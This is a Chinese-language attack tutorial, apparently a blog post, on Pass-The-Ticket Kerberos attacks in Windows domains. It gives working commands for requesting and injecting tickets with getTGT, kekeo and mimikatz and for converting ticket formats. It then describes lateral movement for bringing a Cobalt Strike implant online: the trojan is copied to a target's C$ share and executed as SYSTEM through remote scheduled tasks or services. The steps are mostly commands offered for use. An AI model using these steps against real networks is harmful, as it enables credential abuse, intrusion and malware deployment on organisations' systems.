PTT票据传递攻击

一. PTT票据传递攻击原理

1.PTT介绍

PTT(Pass The Ticket),中文叫票据传递攻击,PTT 攻击只能用于kerberos认证中,NTLM认证中没有, PTT是通过票据进行认证的。

进行票据传递,不需要提权,域用户或者system用户就可以

在认证的过程中主要涉及2个票据:

复制代码
TGT
ST
2.如何得到TGT和ST
复制代码
通过域账号明文密码
通过域账号的NTLM-HASH
通过域账号的ASE
直接伪造
通过系统漏洞

二. PTT攻击的利用条件

1.进行PTT传递认证的条件
复制代码
必须是域环境,域内才可以PTT
必须拥有相应的票据(主要是域管理员票据)
2.不同权限下票据传递的结果
  • 第一步:利用getTGT工具申请不同用户的票据

    域管用户(administrator),域内普通管理员(LEE),域内普通用户(test)

    复制代码
    getTGT.exe 域名/用户名:秘密(hash值)
  • 第二步:利用mimikatz进行票据传递

    复制代码
    命令:
    kerberos::ptc ccache文件 将票据注入内存中
    klist(cmd),kerberos::list(mimikatz)  查看票据列表
    klist purge(cmd),kerberos::purge(mimikatz) 清除本地票据

域管用户(administrator)

进行传递

DC(server 2012)

TWO-PC(server 2008)

FOUR-PC(server 2003)

查看票据

域内普通管理员(LEE)

进行传递

查看票据

域内普通用户(test)

进行传递

查看票据

总结

只有域管administrator和普通管理员的票据有权限进行PTT票据传递,而普通用户不行!

三. ccache和kirbi票据转换

不同的工具生成的票据后缀不一样常见的有两种Ccache和Kirbi,类似于压缩包rar和zip都是压缩文件

比如:getTgt生成的是Ccache, Kekeo生成Kirbi

1.使用kekeo生成票据
复制代码
命令:Tgt::ask /user:域用户 /domain:域名 /password:密码
Gettgt命令 域名/域用户:密码

使用mimikatz打入内存中

这里文件后缀不同,要选择相应的方式

2.票据格式转换

后续我们的实验中不管生成哪种,都可以使用mimikatz进行传递

Kerberos::ptt

Kerberos::ptc

当然两种票据也可以相互转化使用ticketConverter.exe

命令: ticketConverter.exe xxx.ccache xxx.kirbi

四. 使用PTT进行CS上线

将票据导入内存中通信后

其实接下来和之前的步骤一样,先将木马copy到对方C盘

复制代码
copy 木马 \\目标ip或者域名\C$

可以采用计划任务或者是服务的方式运行木马

计划任务

创建计划任务

复制代码
schtasks /create /s IP /u 用户名 /p 密码 /tn 计划任务名称 /tr 实施任务 /sc onstart /RU system /F

运行计划任务

复制代码
schtasks /run /s IP地址  /u username /p password /i /tn "计划任务名称"

删除计划任务

复制代码
schtasks /delete /s IP地址 /u username /p password /tn ""计划任务名称" /f

服务

创建服务

复制代码
sc \\IP地址 create 服务名称 binpath="服务执行内容"

开启服务

复制代码
sc \\IP地址 start 服务名称

删除服务

复制代码
sc \\IP地址 delete 服务名称   

总结

  • PTH:用NTLM-HASH值进行认证-支持kerberos和NTLM认证
  • PTK:用AES值进行认证-只能用于kerberos认证
  • PTT:用票据进行认证-只能用于kerberos认证
相关推荐
菩提小狗7 小时前
每日安全情报报告 · 2026-07-09
网络安全·漏洞·cve·安全情报·每日安全
糖果店的幽灵7 小时前
安全测试从入门到精通 - 环境搭建与基础工具选择
安全·web安全
Joker时代7 小时前
重塑Web3安全防线:Vkey验证器正式登陆安卓与iOS平台,开启数字资产防护新纪元
安全·web3
科技发布7 小时前
有没有安全正规的广告交易平台?推荐传播易APP
安全
JL158 小时前
Agent工程-为什么Agent必须有观测和Tracing
服务器·网络·人工智能·安全
珠***格9 小时前
边缘计算+轻量化AI:台区储能四可装置的“智能大脑”
人工智能·分布式·安全·能源·边缘计算
GoFly开发者10 小时前
Go语言开发框架GoFlyGen新增 网站安全助手 插件,帮助开发者提供应用安全防护,保障平台系统数据安全。
网络·安全
笺落彼岸10 小时前
SpringBoot3 JDK17集成proguard实现混淆打包
安全·https
甄同学11 小时前
第十七篇:Bash Executor命令执行器,安全运行Shell命令
开发语言·安全·bash
h3guang Official11 小时前
K8s安全实战:从漏洞靶场到红蓝对抗
安全·容器·kubernetes